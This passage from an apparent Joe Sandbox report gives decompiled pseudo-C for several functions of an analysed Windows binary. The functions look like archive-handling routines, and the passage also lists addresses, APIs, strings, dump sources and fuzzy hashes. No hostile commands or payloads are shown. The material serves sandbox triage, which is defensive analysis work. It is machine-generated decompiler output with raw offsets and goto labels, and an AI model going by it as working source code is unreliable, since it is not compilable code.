										E0040B406(_t336 - 0x48,  *(_t336 - 0x10),  *(_t336 + 8));
										 *((char*)( *(_t336 + 8) +  *(_t336 - 0x14))) = 1;
									}
								}
								goto L27;
							}
							__eflags =  *((intOrPtr*)(_t334 + 0x19)) - _t275;
							if( *((intOrPtr*)(_t334 + 0x19)) != _t275) {
								goto L23;
							}
							goto L22;
							L27:
							 *(_t336 + 8) =  *(_t336 + 8) + 1;
							_t216 =  *_t334;
							__eflags =  *(_t336 + 8) -  *((intOrPtr*)(_t216 + 0xc));
						} while ( *(_t336 + 8) <  *((intOrPtr*)(_t216 + 0xc)));
						goto L28;
					} else {
						E004088FD(_t336 - 0x48, _t215);
						 *(_t336 - 0x1c) = 1;
						 *((char*)( *(_t336 - 0x18) +  *(_t336 - 0x14))) = 1;
						L34:
						_t219 =  *((intOrPtr*)(_t334 + 0x30));
						 *(_t336 - 0x2c) = _t275;
						 *(_t336 - 0x28) = _t275;
						if(_t219 == _t275) {
							L37:
							 *(_t331 + 0xc0) =  *(_t336 - 0x2c);
							_t221 =  *(_t336 - 0x28);
							 *(_t331 + 0xc4) =  *(_t336 - 0x28);
							if( *((intOrPtr*)(_t334 + 0x19)) == _t275) {
								L65:
								if( *_t331 != _t275) {
									L67:
									E00403204(E00403204(E00403204(E00403204(_t221,  *(_t336 - 0x14)),  *(_t336 - 0x48)),  *((intOrPtr*)(_t336 - 0x54))),  *((intOrPtr*)(_t336 - 0x60)));
									_t226 = _t275;
									L68:
									 *[fs:0x0] =  *((intOrPtr*)(_t336 - 0xc));
									return _t226;
								}
								L66:
								_t275 = 1;
								goto L67;
							}
							_t221 =  *(_t336 - 0x44);
							 *(_t336 - 0x24) =  *(_t336 - 0x44);
							if( *(_t336 - 0x18) >= _t275) {
								_t221 =  *(_t336 - 0x1c);
								 *(_t336 - 0x24) =  *(_t336 - 0x1c);
							}
							 *(_t336 - 0x18) = _t275;
							if( *(_t336 - 0x24) > _t275) {
								do {
									 *(_t331 + 0x94) =  *( *(_t336 - 0x48) +  *(_t336 - 0x18) * 4);
									_t229 =  *((intOrPtr*)(_t334 + 0x38));
									if(_t229 == _t275) {
										L43:
										_t230 =  *((intOrPtr*)(_t334 + 0x30));
										if(_t230 == _t275) {
											L45:
											 *(_t336 - 0x10) = _t275;
											 *(_t336 - 4) = 4;
											_t232 = E00409D49(_t334,  *(_t331 + 0x94), _t336 - 0x10);
											 *(_t336 + 8) = _t232;
											if(_t232 != _t275) {
												_t221 =  *(_t336 - 0x10);
												 *(_t336 - 4) = 3;
												__eflags = _t221 - _t275;
												if(_t221 != _t275) {
													_t221 =  *((intOrPtr*)( *_t221 + 8))(_t221);
												}
												_t275 =  *(_t336 + 8);
												goto L67;
											}
											_t233 =  *(_t336 - 0x10);
											if(_t233 != _t275) {
												__eflags =  *((intOrPtr*)(_t334 + 0x30)) - _t275;
												if(__eflags == 0) {
													 *(_t336 - 0x20) = _t275;
													 *(_t336 - 4) = 5;
													 *((intOrPtr*)( *_t233))(_t233, 0x41b1c0, _t336 - 0x20);
													_t235 =  *(_t336 - 0x20);
													__eflags = _t235 - _t275;
													if(_t235 == _t275) {
														_t236 =  *(_t336 - 0x10);
														 *(_t336 - 4) = 3;
														__eflags = _t236 - _t275;
														if(_t236 != _t275) {
															_t236 =  *((intOrPtr*)( *_t236 + 8))(_t236);
														}
														E00403204(E00403204(E00403204(E00403204(_t236,  *(_t336 - 0x14)),  *(_t336 - 0x48)),  *((intOrPtr*)(_t336 - 0x54))),  *((intOrPtr*)(_t336 - 0x60)));
														_t226 = 0x80004001;
														goto L68;
													}
													 *(_t336 + 8) =  *((intOrPtr*)( *_t235 + 0xc))(_t235,  *((intOrPtr*)(_t334 + 0x34)));
													_t242 =  *(_t336 - 0x20);
													__eflags = _t242 - _t275;
													 *(_t336 - 4) = 4;
													if(__eflags != 0) {
														 *((intOrPtr*)( *_t242 + 8))(_t242);
													}
													L53:
													_t243 = E00409970(_t331, __eflags,  *(_t336 - 0x10), _t275, _t275,  *(_t336 + 8));
													__eflags = _t243 - _t275;
													 *(_t336 - 0x20) = _t243;
													if(_t243 != _t275) {
														_t221 =  *(_t336 - 0x10);
														 *(_t336 - 4) = 3;
														__eflags = _t221 - _t275;
														if(_t221 != _t275) {
															_t221 =  *((intOrPtr*)( *_t221 + 8))(_t221);
														}
														_t275 =  *(_t336 - 0x20);
														goto L67;
													}
													__eflags =  *(_t336 + 8) - 1;
													if( *(_t336 + 8) != 1) {
														__eflags =  *(_t336 + 8) - _t275;
														if( *(_t336 + 8) == _t275) {
															E004063E5(_t331,  *(_t336 - 0x10));
															_t221 =  *(_t336 - 0x10);
															 *(_t336 - 4) = 3;
															__eflags = _t221 - _t275;
															if(_t221 != _t275) {
																_t221 =  *((intOrPtr*)( *_t221 + 8))(_t221);
															}
														} else {
															_t221 =  *(_t336 - 0x10);
															 *(_t336 - 4) = 3;
															__eflags = _t221 - _t275;
															if(_t221 != _t275) {
																_t221 =  *((intOrPtr*)( *_t221 + 8))(_t221);
															}
															_t275 =  *(_t336 + 8);
														}
														goto L67;
													}
													__eflags =  *((intOrPtr*)(_t331 + 0x13)) - _t275;
													if( *((intOrPtr*)(_t331 + 0x13)) == _t275) {
														L57:
														 *(_t336 + 0xb) = _t275;
														L58:
														__eflags =  *(_t336 - 0x18) - _t275;
														if( *(_t336 - 0x18) != _t275) {
															L62:
															_t245 =  *(_t336 - 0x10);
															 *(_t336 - 4) = 3;
															__eflags = _t245 - _t275;
															if(_t245 != _t275) {
																 *((intOrPtr*)( *_t245 + 8))(_t245);
															}
															goto L64;
														}
														__eflags =  *(_t336 - 0x1c) - 1;
														if( *(_t336 - 0x1c) != 1) {
															goto L62;
														}
														 *(_t331 + 0x1c) =  *(_t331 + 0x94);
														E0040A26D(_t331 + 0x40, _t331 + 0x10);
														__eflags =  *((intOrPtr*)(_t334 + 0x1a)) - _t275;
														if( *((intOrPtr*)(_t334 + 0x1a)) != _t275) {
															goto L62;
														}
														__eflags =  *(_t336 + 0xb) - _t275;
														if( *(_t336 + 0xb) != _t275) {
															_t221 =  *(_t336 - 0x10);
															 *(_t336 - 4) = 3;
															__eflags = _t221 - _t275;
															if(_t221 != _t275) {
																_t221 =  *((intOrPtr*)( *_t221 + 8))(_t221);
															}
															goto L66;
														}
														goto L62;
													}
													__eflags =  *(_t331 + 0x14) & 0x00000001;
													 *(_t336 + 0xb) = 1;
													if(( *(_t331 + 0x14) & 0x00000001) == 0) {
														goto L58;
													}
													goto L57;
												}
												 *((intOrPtr*)(_t336 - 0x3c)) =  *((intOrPtr*)(_t336 - 0x34));
												 *(_t336 - 0x38) =  *(_t336 - 0x30);
												 *(_t336 + 8) =  *((intOrPtr*)( *_t233 + 0xc))(_t233,  *((intOrPtr*)(_t334 + 0x30)), _t336 - 0x3c,  *((intOrPtr*)(_t334 + 0x38)));
												goto L53;
											}
											 *(_t336 - 4) = 3;
											goto L64;
										}
										_t221 =  *((intOrPtr*)( *_t230 + 0x10))(_t230, _t275, _t275, _t275, _t275);
										if(_t221 != _t275) {
											L69:
											_t275 = _t221;
											goto L67;
										}
										goto L45;
									}
									_t221 =  *((intOrPtr*)( *_t229 + 0xc))(_t229, _t275, _t336 - 0x2c);
									if(_t221 != _t275) {
										goto L69;
									}
									goto L43;
									L64:
									 *(_t336 - 0x18) =  *(_t336 - 0x18) + 1;
									_t221 =  *(_t336 - 0x18);
								} while ( *(_t336 - 0x18) <  *(_t336 - 0x24));
							}
							goto L65;
						}
						_t221 =  *((intOrPtr*)( *_t219 + 0x10))(_t219, _t275, _t275, 2, _t336 - 0x2c);
						if(_t221 != _t275) {
							goto L69;
						}
						_t252 =  *((intOrPtr*)(_t334 + 0x30));
						_t221 =  *((intOrPtr*)( *_t252 + 0x10))(_t252, _t275, _t275, _t275, _t275);
						if(_t221 != _t275) {
							goto L69;
						}
						goto L37;
					}
				} else {
					goto L13;
				}
				do {
					L13:
					 *(_t214 +  *(_t336 - 0x14)) = _t275;
					_t214 = _t214 + 1;
				} while (_t214 <  *( *_t334 + 0xc));
				goto L14;
			}

0x00409db2
0x00409dbd
0x00409dbf
0x00409dc1
0x00409dc5
0x00409dca
0x00409dcd
0x00409dcd
0x00409dcf
0x00409dd4
0x00409dd9
0x00409ddc
0x00409ddc
0x00409ddf
0x00409de4
0x00409de9
0x00409dec
0x00409dec
0x00409df2
0x00409df7
0x00409dfb
0x00409e07
0x00409e0d
0x00409e13
0x00409e1b
0x00409e1e
0x00409e28
0x00409e33
0x00409e40
0x00409e40
0x00409e45
0x00409e48
0x00409e4b
0x00409e4e
0x00409e51
0x00409e55
0x00409e5a
0x00409e5f
0x00409e64
0x00409e66
0x00409e66
0x00409e69
0x00409e70
0x00409e70
0x00409e75
0x00409e77
0x00409e7e
0x00409e8e
0x00409e91
0x00409ea1
0x00409ea8
0x00409e93
0x00409e96
0x00409e9c
0x00409e9c
0x00409eab
0x00409eb0
0x00409eb3
0x00409ed4
0x00409ed6
0x00409ed9
0x00409edc
0x00409edf
0x00409f6f
0x00409f6f
0x00409f72
0x00409f89
0x00409f8c
0x00409f8f
0x00409f92
0x00409f94
0x00409f96
0x00409f96
0x00000000
0x00409f94
0x00409f76
0x00409f77
0x00409f7a
0x00409f86
0x00000000
0x00409f86
0x00409f7c
0x00000000
0x00000000
0x00000000
0x00000000
0x00409ee5
0x00409ee5
0x00409eeb
0x00409ef4
0x00409ef7
0x00409efe
0x00409f09
0x00409f0e
0x00409f10
0x00000000
0x00000000
0x00409f12
0x00409f1c
0x00409f21
0x00409f23
0x00409f2c
0x00409f31
0x00409f33
0x00409f59
0x00409f35
0x00409f3b
0x00409f42
0x00409f4d
0x00409f4d
0x00409f33
0x00000000
0x00409f23
0x00409ef9
0x00409efc
0x00000000
0x00000000
0x00000000
0x00409f5e
0x00409f5e
0x00409f61
0x00409f66
0x00409f66
0x00000000
0x00409eb5
0x00409eb9
0x00409ec4
0x00409ecb
0x00409f99
0x00409f99
0x00409f9c
0x00409fa1
0x00409fa4
0x00409fd1
0x00409fd4
0x00409fda
0x00409fdd
0x00409fe6
0x0040a166
0x0040a168
0x0040a16d
0x0040a188
0x0040a190
0x0040a192
0x0040a198
0x0040a1a0
0x0040a1a0
0x0040a16a
0x0040a16c
0x00000000
0x0040a16c
0x00409fec
0x00409ff2
0x00409ff5
0x00409ff7
0x00409ffa
0x00409ffa
0x0040a000
0x0040a003
0x0040a009
0x0040a012
0x0040a018
0x0040a01d
0x0040a032
0x0040a032
0x0040a037
0x0040a04b
0x0040a04b
0x0040a054
0x0040a05f
0x0040a066
0x0040a069
0x0040a1a7
0x0040a1aa
0x0040a1ae
0x0040a1b0
0x0040a1b5
0x0040a1b5
0x0040a1b8
0x00000000
0x0040a1b8
0x0040a06f
0x0040a074
0x0040a07f
0x0040a082
0x0040a0a5
0x0040a0b4
0x0040a0b8
0x0040a0ba
0x0040a0bd
0x0040a0bf
0x0040a1bd
0x0040a1c0
0x0040a1c4
0x0040a1c6
0x0040a1cb
0x0040a1cb
0x0040a1e9
0x0040a1f1
0x00000000
0x0040a1f1
0x0040a0ce
0x0040a0d1
0x0040a0d4
0x0040a0d6
0x0040a0da
0x0040a0df
0x0040a0df
0x0040a0e2
0x0040a0ec
0x0040a0f1
0x0040a0f3
0x0040a0f6
0x0040a1f8
0x0040a1fb
0x0040a1ff
0x0040a201
0x0040a206
0x0040a206
0x0040a209
0x00000000
0x0040a209
0x0040a0fc
0x0040a100
0x0040a22b
0x0040a22e
0x0040a24e
0x0040a253
0x0040a256
0x0040a25a
0x0040a25c
0x0040a265
0x0040a265
0x0040a230
0x0040a230
0x0040a233
0x0040a237
0x0040a239
0x0040a23e
0x0040a23e
0x0040a241
0x0040a241
0x00000000
0x0040a22e
0x0040a106
0x0040a109
0x0040a115
0x0040a115
0x0040a118
0x0040a118
0x0040a11b
0x0040a146
0x0040a146
0x0040a149
0x0040a14d
0x0040a14f
0x0040a154
0x0040a154
0x00000000
0x0040a14f
0x0040a11d
0x0040a121
0x00000000
0x00000000
0x0040a12c
0x0040a133
0x0040a138
0x0040a13b
0x00000000
0x00000000
0x0040a13d
0x0040a140
0x0040a211
0x0040a214
0x0040a218
0x0040a21a
0x0040a223
0x0040a223
0x00000000
0x0040a21a
0x00000000
0x0040a140
0x0040a10b
0x0040a10f
0x0040a113
0x00000000
0x00000000
0x00000000
0x0040a113
0x0040a08d
0x0040a097
0x0040a0a0
0x00000000
0x0040a0a0
0x0040a076
0x00000000
0x0040a076
0x0040a040
0x0040a045
0x0040a1a3
0x0040a1a3
0x00000000
0x0040a1a3
0x00000000
0x0040a045
0x0040a027
0x0040a02c
0x00000000
0x00000000
0x00000000
0x0040a157
0x0040a157
0x0040a15a
0x0040a15d
0x0040a009
0x00000000
0x0040a003
0x00409fb1
0x00409fb6
0x00000000
0x00000000
0x00409fbc
0x00409fc6
0x00409fcb
0x00000000
0x00000000
0x00000000
0x00409fcb
0x00000000
0x00000000
0x00000000
0x00409e80
0x00409e80
0x00409e83
0x00409e88
0x00409e89
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00409DB2

Strings

Split, xrefs: 00409F01

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog
String ID: Split
API String ID: 3519838083-1882502421
Opcode ID: 4df85aa84943a756da905cd6b24cfb30d96fa98b4a0dc77eabcbb0f2acb6280f
Instruction ID: 09c5a0370ad5ed14047af77479f4839a91d55b5c5a0b00876ef22aa24b9ab58f
Opcode Fuzzy Hash: 4df85aa84943a756da905cd6b24cfb30d96fa98b4a0dc77eabcbb0f2acb6280f
Instruction Fuzzy Hash: 98022A70A00249EFCB10DFA5C8849AEBBB5BF48304F14847EE516EB392C739AE55CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004026C1, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 152
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E004026C1(intOrPtr* __ecx, void* __eflags) {
				void* _t72;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t86;
				void* _t87;
				void* _t89;
				intOrPtr* _t93;
				void* _t98;
				void* _t99;
				void* _t101;
				void* _t103;
				void* _t146;
				intOrPtr* _t147;
				intOrPtr* _t150;
				void* _t152;
				void* _t159;

				_t159 = __eflags;
				E00418D80(E004195EF, _t152);
				_t150 = __ecx;
				E00404D7D(_t152 - 0x74);
				E0040368D(_t152 - 0x4c);
				_t146 = __ecx + 4;
				 *((intOrPtr*)(_t152 - 4)) = 0;
				_t72 = E00404DAF(_t152 - 0x74, _t159,  *((intOrPtr*)(__ecx + 4))); // executed
				if(_t72 != 0) {
					E0040E83C(_t152 - 0x30);
					 *((intOrPtr*)(_t152 - 0x24)) = 0;
					 *((intOrPtr*)(_t152 - 0x20)) = 0;
					 *((intOrPtr*)(_t152 - 0x1c)) = 0;
					 *((char*)(_t152 - 4)) = 2;
					E004028C3(_t152 - 0xc4);
					 *((intOrPtr*)(_t152 - 0xc4)) =  *_t150;
					 *((intOrPtr*)(_t152 - 0x9c)) = _t152 - 0x30;
					 *((char*)(_t152 - 4)) = 3;
					 *((intOrPtr*)(_t152 - 0x98)) = _t152 - 0x24;
					E004037D2(_t152 - 0x80, _t146);
					_t79 =  *((intOrPtr*)(_t150 + 0x1c));
					__eflags = _t79;
					if(_t79 == 0) {
						_t80 = 0;
						__eflags = 0;
					} else {
						_t80 = _t79 + 4;
					}
					_push(_t80);
					_t147 = _t150 + 0x28;
					_push(_t152 - 0xc4); // executed
					_t82 = E0040AFA7(_t147); // executed
					__eflags = _t82;
					 *((intOrPtr*)(_t150 + 0x88)) = _t82;
					if(__eflags == 0) {
						E00403740(_t152 - 0x18, __eflags, _t150 + 0x10);
						 *((char*)(_t152 - 4)) = 4;
						E004055BC(_t152 - 0x18);
						_t86 = E0040448C( *((intOrPtr*)(_t152 - 0x18)), __eflags); // executed
						__eflags = _t86;
						if(_t86 != 0) {
							_t87 = E004036F3(_t152 - 0x3c, "Default");
							 *((char*)(_t152 - 4)) = 6;
							_t89 = E00401D71( *((intOrPtr*)(_t150 + 0x1c)),  *((intOrPtr*)( *((intOrPtr*)( *_t147 +  *(_t147 + 4) * 4 - 4)))), _t152 - 0x18, _t87, _t152 - 0x5c, 0);
							 *((char*)(_t152 - 4)) = 4;
							E00403204(_t89,  *((intOrPtr*)(_t152 - 0x3c)));
							_t93 =  *((intOrPtr*)( *((intOrPtr*)( *_t147 +  *(_t147 + 4) * 4 - 4))));
							 *((intOrPtr*)(_t150 + 0x88)) =  *((intOrPtr*)( *_t93 + 0x1c))(_t93, 0, 0xffffffff, 0,  *((intOrPtr*)(_t150 + 0x20)));
							E00403204(E00403204(E00403204(_t94,  *((intOrPtr*)(_t152 - 0x18))),  *((intOrPtr*)(_t152 - 0x80))),  *((intOrPtr*)(_t152 - 0x24)));
						} else {
							_push(_t152 - 0x18);
							_t101 = E0040B7FD(_t152 - 0x3c);
							 *((char*)(_t152 - 4)) = 5;
							_t103 = E00403204(E004037D2(_t150 + 0x8c, _t101),  *((intOrPtr*)(_t152 - 0x3c)));
							 *((intOrPtr*)(_t150 + 0x88)) = 0x80004005;
							E00403204(E00403204(E00403204(_t103,  *((intOrPtr*)(_t152 - 0x18))),  *((intOrPtr*)(_t152 - 0x80))),  *((intOrPtr*)(_t152 - 0x24)));
						}
					} else {
						E00403204(E00403204(E004038D0(_t150 + 0x8c,  *0x41b620),  *((intOrPtr*)(_t152 - 0x80))),  *((intOrPtr*)(_t152 - 0x24)));
					}
					 *((char*)(_t152 - 4)) = 0;
					_t98 = E00402F4A(_t152 - 0x30);
				} else {
					_t98 = E004038D0(__ecx + 0x8c,  *0x41b61c);
					 *((intOrPtr*)(__ecx + 0x88)) = 0x80004005;
				}
				_t99 = E00403204(_t98,  *((intOrPtr*)(_t152 - 0x4c)));
				 *[fs:0x0] =  *((intOrPtr*)(_t152 - 0xc));
				return _t99;
			}

0x004026c1
0x004026c6
0x004026d3
0x004026d9
0x004026e1
0x004026e9
0x004026f1
0x004026f4
0x004026fb
0x00402720
0x00402725
0x00402728
0x0040272b
0x00402734
0x00402738
0x00402740
0x00402749
0x00402755
0x00402759
0x0040275f
0x00402764
0x00402767
0x00402769
0x00402770
0x00402770
0x0040276b
0x0040276b
0x0040276b
0x00402772
0x00402773
0x0040277e
0x0040277f
0x00402784
0x00402786
0x0040278c
0x004027bd
0x004027c5
0x004027c9
0x004027d1
0x004027d6
0x004027d8
0x00402832
0x0040283d
0x00402854
0x0040285c
0x00402860
0x00402874
0x00402882
0x00402898
0x004027da
0x004027e2
0x004027e6
0x004027f2
0x004027fe
0x00402806
0x00402820
0x00402825
0x0040278e
0x004027aa
0x004027b0
0x004028a3
0x004028a6
0x004026fd
0x00402709
0x0040270e
0x0040270e
0x004028ae
0x004028ba
0x004028c2

APIs

__EH_prolog.LIBCMT ref: 004026C6

Part of subcall function 00404DAF: __EH_prolog.LIBCMT ref: 00404DB4

Strings

Default, xrefs: 0040282A

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog
String ID: Default
API String ID: 3519838083-753088835
Opcode ID: 292ea48c8768a95794b35225bdc2b66726df2df7c89ab67701c3af441bcaefd0
Instruction ID: a54c0451a2b32841cee07a3996f3f819ed4c8f4dfc8041cf4803658e5a70c8e5
Opcode Fuzzy Hash: 292ea48c8768a95794b35225bdc2b66726df2df7c89ab67701c3af441bcaefd0
Instruction Fuzzy Hash: 84515171800109ABDB11EFA5C981EDDFBB9BF14308F1085AEE515B32D2DB786A09CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040FE8A, Relevance: 3.2, APIs: 2, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0040FE8A(intOrPtr* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t116;
				void* _t117;
				intOrPtr _t122;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr* _t139;
				intOrPtr _t144;
				signed int _t145;
				void* _t150;
				signed int _t185;
				void* _t190;
				signed int _t191;
				intOrPtr _t193;
				intOrPtr* _t195;
				void* _t197;
				void* _t204;

				_t204 = __eflags;
				E00418D80(E0041A566, _t197);
				_t195 = __ecx;
				_push(_t190);
				 *((intOrPtr*)(_t197 - 0x1c)) = __ecx;
				E0040E063(_t197 - 0xa0);
				 *(_t197 - 4) = 0;
				 *((intOrPtr*)(_t197 - 0x2c)) = 0;
				 *((intOrPtr*)(_t197 - 0x28)) = 0;
				 *((intOrPtr*)(_t197 - 0x24)) = 0;
				 *(_t197 - 4) = 1;
				E0040E83C(_t197 - 0x44);
				 *(_t197 - 4) = 2;
				E0040E83C(_t197 - 0x38);
				 *(_t197 - 4) = 3;
				E0040FC2A(0, __ecx, __edx, _t190, __ecx, _t204, 0,  *((intOrPtr*)(_t197 + 0x10)), _t197 - 0xa0, _t197 - 0x2c, _t197 - 0x44);
				E0040BC60(_t197 - 0x100, _t204,  *((intOrPtr*)(_t195 + 0x78)));
				_t191 = 0;
				 *(_t197 - 4) = 4;
				 *(_t197 - 0x14) = 0;
				if( *((intOrPtr*)(_t197 - 0x9c)) <= 0) {
					L21:
					_t116 =  *((intOrPtr*)(_t197 - 0x98));
					if(_t116 != 0) {
						 *((intOrPtr*)(_t195 + 0x70)) =  *((intOrPtr*)(_t195 + 0x70)) +  *((intOrPtr*)(_t116 +  *(_t197 - 0xa0) * 8));
						asm("adc [esi+0x74], eax");
					}
					 *(_t197 - 4) = 3;
					_t117 = E0040DC5D(_t197 - 0x100); // executed
					E00403204(E00403204(E00403204(_t117,  *((intOrPtr*)(_t197 - 0x38))),  *((intOrPtr*)(_t197 - 0x44))),  *((intOrPtr*)(_t197 - 0x2c)));
					 *(_t197 - 4) =  *(_t197 - 4) | 0xffffffff;
					E0040DF15(_t197 - 0xa0);
					_t122 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t197 - 0xc));
					return _t122;
				}
				while(1) {
					_t124 = E00410D82( *((intOrPtr*)(_t197 + 0x14)));
					_t169 = _t124;
					 *((intOrPtr*)(_t197 - 0x18)) = _t124;
					_t185 = ( *( *((intOrPtr*)(_t197 - 0x6c)) + _t191) & 0x000000ff) +  *((intOrPtr*)( *((intOrPtr*)(_t197 - 0x74)) + _t191 * 4));
					_t127 =  *((intOrPtr*)(_t197 - 0x78));
					_t193 =  *((intOrPtr*)(_t127 + _t185 * 8));
					_t128 =  *((intOrPtr*)(_t127 + 4 + _t185 * 8));
					if(_t193 != _t193 || 0 != _t128) {
						break;
					}
					E00407AB8(_t169, _t193);
					_push(0x14);
					_t139 = E004031DD();
					if(_t139 == 0) {
						_t195 = 0;
						__eflags = 0;
					} else {
						 *((intOrPtr*)(_t139 + 4)) = 0;
						 *_t139 = 0x41bd38;
						_t195 = _t139;
					}
					_t209 = _t195;
					 *((intOrPtr*)(_t197 - 0x48)) = _t195;
					if(_t195 != 0) {
						 *((intOrPtr*)( *_t195 + 4))(_t195);
					}
					 *((intOrPtr*)(_t195 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t197 - 0x18))));
					 *((intOrPtr*)(_t195 + 0x10)) = 0;
					 *((intOrPtr*)(_t195 + 0xc)) = _t193;
					 *(_t197 - 4) = 5;
					 *((char*)(_t197 - 0xd)) = 0;
					asm("adc ecx, [ebp+0xc]");
					_t144 = E0040BD85(_t197 - 0x100, _t209,  *((intOrPtr*)( *((intOrPtr*)(_t197 - 0x1c)))),  *((intOrPtr*)( *((intOrPtr*)(_t197 + 0x10)))) +  *((intOrPtr*)(_t197 + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t197 + 0x10)) + 4)), _t197 - 0xa0,  *(_t197 - 0x14), 0, _t195, 0, 0, _t197 - 0xd, 0, 1, 0, 0); // executed
					 *((intOrPtr*)(_t197 - 0x20)) = _t144;
					if(_t144 != 0) {
						L26:
						__eflags = _t195;
						 *(_t197 - 4) = 4;
						if(_t195 != 0) {
							 *((intOrPtr*)( *_t195 + 8))(_t195);
						}
						 *(_t197 - 4) = 3;
						E00403204(E00403204(E00403204(E0040DC5D(_t197 - 0x100),  *((intOrPtr*)(_t197 - 0x38))),  *((intOrPtr*)(_t197 - 0x44))),  *((intOrPtr*)(_t197 - 0x2c)));
						 *(_t197 - 4) =  *(_t197 - 4) | 0xffffffff;
						E0040DF15(_t197 - 0xa0);
						_t122 =  *((intOrPtr*)(_t197 - 0x20));
						goto L24;
					} else {
						if( *((intOrPtr*)(_t197 - 0xd)) != 0) {
							 *((char*)( *((intOrPtr*)(_t197 - 0x1c)) + 0x3c)) = 1;
						}
						_t145 =  *(_t197 - 0x14);
						if(_t145 <  *((intOrPtr*)(_t197 - 0x90)) &&  *((intOrPtr*)( *((intOrPtr*)(_t197 - 0x94)) + _t145)) != 0) {
							 *((intOrPtr*)(_t197 - 0x18)) =  *((intOrPtr*)(_t197 - 0x88)) + _t145 * 4;
							_t150 = E00418C10( *((intOrPtr*)( *((intOrPtr*)(_t197 - 0x18)))), _t193);
							_t181 =  *((intOrPtr*)(_t197 - 0x18));
							if(_t150 !=  *((intOrPtr*)( *((intOrPtr*)(_t197 - 0x18))))) {
								E0040E966(_t181);
							}
						}
						 *(_t197 - 4) = 4;
						if(_t195 != 0) {
							 *((intOrPtr*)( *_t195 + 8))(_t195);
						}
						 *(_t197 - 0x14) =  *(_t197 - 0x14) + 1;
						if( *(_t197 - 0x14) <  *((intOrPtr*)(_t197 - 0x9c))) {
							_t191 =  *(_t197 - 0x14);
							continue;
						} else {
							_t195 =  *((intOrPtr*)(_t197 - 0x1c));
							goto L21;
						}
					}
				}
				_push(0x41de18);
				_push(_t197 + 0x13);
				L00418E02();
				goto L26;
			}

0x0040fe8a
0x0040fe8f
0x0040fe9c
0x0040fe9e
0x0040fea5
0x0040fea8
0x0040feaf
0x0040feb2
0x0040feb5
0x0040feb8
0x0040febe
0x0040fec2
0x0040feca
0x0040fece
0x0040fee4
0x0040feec
0x0040fefb
0x0040ff00
0x0040ff08
0x0040ff0c
0x0040ff0f
0x0041003d
0x0041003d
0x00410045
0x00410054
0x00410057
0x00410057
0x00410060
0x00410064
0x0041007c
0x00410081
0x0041008e
0x00410093
0x00410095
0x0041009b
0x004100a3
0x004100a3
0x0040ff1a
0x0040ff1d
0x0040ff22
0x0040ff27
0x0040ff31
0x0040ff34
0x0040ff37
0x0040ff3c
0x0040ff40
0x00000000
0x00000000
0x0040ff4f
0x0040ff54
0x0040ff56
0x0040ff5e
0x0040ff6d
0x0040ff6d
0x0040ff60
0x0040ff60
0x0040ff63
0x0040ff69
0x0040ff69
0x0040ff6f
0x0040ff71
0x0040ff74
0x0040ff79
0x0040ff79
0x0040ff97
0x0040ffa1
0x0040ffa4
0x0040ffb1
0x0040ffb5
0x0040ffb8
0x0040ffc4
0x0040ffcb
0x0040ffce
0x004100ba
0x004100ba
0x004100bc
0x004100c0
0x004100c5
0x004100c5
0x004100ce
0x004100ea
0x004100ef
0x004100fc
0x00410101
0x00000000
0x0040ffd4
0x0040ffd7
0x0040ffdc
0x0040ffdc
0x0040ffe0
0x0040ffe9
0x00410006
0x00410009
0x0041000e
0x00410013
0x00410015
0x00410015
0x00410013
0x0041001c
0x00410020
0x00410025
0x00410025
0x00410028
0x00410034
0x0040ff17
0x00000000
0x0041003a
0x0041003a
0x00000000
0x0041003a
0x00410034
0x0040ffce
0x004100a9
0x004100b4
0x004100b5
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0040FE8F
_CxxThrowException.MSVCRT(?,0041DE18), ref: 004100B5

Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: ExceptionThrow$H_prologmalloc
String ID:
API String ID: 3044594480-0
Opcode ID: 33641076fc2728d8ba28cdde326b41d1189eb1e6bfb453c54c8ab34be38ba523
